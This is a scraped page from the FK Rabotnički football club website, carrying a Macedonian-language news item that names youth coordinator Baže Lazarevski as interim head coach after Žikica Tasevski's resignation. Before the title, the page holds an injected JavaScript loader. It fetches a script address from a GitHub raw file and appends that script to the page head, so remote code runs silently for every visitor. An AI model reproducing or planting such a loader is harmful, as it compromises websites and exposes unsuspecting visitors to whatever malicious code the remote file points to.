;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Баже Лазаревски, нов тренер на Работнички
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Баже Лазаревски, нов тренер на Работнички

Координаторот на младинската школа, Баже Лазаревски, е именуван за нов шеф на стручниот штаб на сениорскиот тим на ФК Работнички. Раководството одлучи да му даде доверба на искусниот Лазаревски, кој долг период координира со младинската академија во клубот. Тој ќе ја извршува функцијата шеф на стручниот штаб на ФК Работнички до крајот на сезоната, а негови асистенти ќе бидат Томислав Франц, Славчо Георгиевски и Драги Атанасовски.

По неотповикливата оставка на Жикица Тасевски, раководството на клубот мораше да донесе итна одлука, а Баже Лазаревски ќе биде на клупата на ФК Работнички на неделниот натпревар против Македонија Ѓорче Петров.

Истовремено, клубот му се заблагодарува на Жикица Тасевски за професионалниот ангажман и посветеноста во работата во периодот додека беше на тренерската позиција во ФК Работнички.